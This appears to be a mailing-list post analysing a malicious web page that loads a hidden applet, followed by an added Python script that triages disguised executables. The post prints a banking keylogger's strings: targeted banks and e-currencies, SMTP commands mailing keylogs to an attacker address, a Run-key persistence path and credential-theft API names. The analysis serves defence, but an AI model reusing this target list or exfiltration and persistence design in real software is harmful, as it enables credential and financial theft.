Message-ID: <402FC40D.752.65AE52B@localhost>
From: n.teusink at planet.nl (n.teusink@...net.nl)
Subject: Re: http://federalpolice.com:article872@...5686747
From the source of that page:
<APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>
BlackBox.class is detected immediately by my virusscanner as ClassLoader/E, more
info:
http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm
The javautil.zip appears to be an exe file renamed to zip. The exe is compressed with
FSG.
Interesting pieces of output from strings on the decompressed exe:
----------------------------------------------BEGIN
HookerDll.Dll
Install
Uninstall
EDIT
%s\%s
WVS3
\kgn.txt
Hooker.dll
Install
Uninstall
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
0+060F0
1$11161J1U1i1
2.2I2\2
3'3,3E3c3h3r3
4%42484>4D4J4P4V4\4b4h4n4t4z4
DATA
EHLO localhost
Subject: KeyLog from (%s)
MAIL FROM:<pentasatan@...l.ru>
RCPT TO:<pentasatan@...l.ru>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:
----------------------------------------------END
I think you can draw your own conclusions about this file.
Niels
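The triage Niels did by hand (notice that the "zip" is really a PE, then read the strings for targets, exfiltration and persistence) is easy to script. The block below is an added example, not code from the post; it does not unpack FSG (the post's strings came from the already-decompressed exe), so it is meant to run on the unpacked binary. The indicator lists are constructed from the strings quoted above, and the sample blob is a constructed, minimal MZ/PE header with a few of those strings appended, so the example runs offline.

```python
"""Triage a file that claims to be a .zip: identify it by magic bytes, pull
printable strings, and bucket them into the indicator classes seen in the post.
Added example; indicator lists and the sample blob are constructed for the demo."""
import re
import struct

# Constructed from the strings quoted in the post (lower-cased substrings).
BANK_TARGETS = {
    "westpac", "bendigo", "commbank", "netbank", "citibank", "bank of america",
    "e-gold", "e-bullion", "evocash", "intgold", "paypal", "bankwest", "cibc",
    "scotiabank", "bank of montreal", "royalbank", "tdwaterhouse", "wells fargo",
    "suntrust", "wachovia", "chase", "goldmoney", "pecunix", "hyperwallet",
}
# SMTP commands and the mail subject used to ship the keylog out.
SMTP_PREFIXES = ("ehlo ", "mail from:", "rcpt to:", "subject:")
PERSISTENCE = {"software\\microsoft\\windows\\currentversion\\run"}
# Protected Storage / IE credential and cookie theft.
CRED_THEFT = {"pstorec.dll", "pstorecreateinstance", "wininetcachecredentials", "cookie:"}


def sniff_type(data: bytes) -> str:
    """Classify by magic bytes; the file extension is never trusted."""
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # offset of PE header
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
        return "mz-dos"
    return "unknown"


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """ASCII-only equivalent of `strings -n <min_len>`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(strings) -> dict:
    """Bucket strings into the indicator classes the post's output shows."""
    hits = {"banking_targets": [], "smtp_exfil": [], "persistence": [], "credential_theft": []}
    for s in strings:
        low = s.lower()
        if any(k in low for k in BANK_TARGETS):
            hits["banking_targets"].append(s)
        if low.startswith(SMTP_PREFIXES) or low == "data":
            hits["smtp_exfil"].append(s)
        if any(k in low for k in PERSISTENCE):
            hits["persistence"].append(s)
        if any(k in low for k in CRED_THEFT):
            hits["credential_theft"].append(s)
    return hits


def analyze(data: bytes, claimed_name: str) -> dict:
    """Full pass: real type, whether the extension lies, and indicator hits."""
    real = sniff_type(data)
    ext = claimed_name.rsplit(".", 1)[-1].lower()
    disguised = (ext == "zip" and real != "zip")  # e.g. javautil.zip that is a PE
    return {"type": real, "disguised": disguised, "hits": triage(extract_strings(data))}


def build_sample() -> bytes:
    """Constructed stand-in for the unpacked exe: minimal MZ/PE header plus strings."""
    hdr = bytearray(0x44)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> PE signature at 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    body = b"\x00".join([
        b"Hooker.dll", b"Install", b"Westpac", b"PayPal",
        b"EHLO localhost", b"Subject: KeyLog from (%s)",
        b"MAIL FROM:<dropbox@example.invalid>",          # placeholder, not the real address
        b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
        b"pstorec.dll", b"PStoreCreateInstance", b"\x01\x02", b"Cookie:",
    ])
    return bytes(hdr) + b"\x00" + body


if __name__ == "__main__":
    report = analyze(build_sample(), "javautil.zip")
    print("real type:", report["type"], "| extension lies:", report["disguised"])
    for bucket, found in report["hits"].items():
        print(f"{bucket}: {found}")
```

Running it against a real sample is `analyze(open(path, "rb").read(), os.path.basename(path))`; the banking bucket alone would not prove much, but a PE hiding behind a .zip extension combined with SMTP commands, a Run key and Protected Storage API names is the same picture Niels drew from the raw strings output.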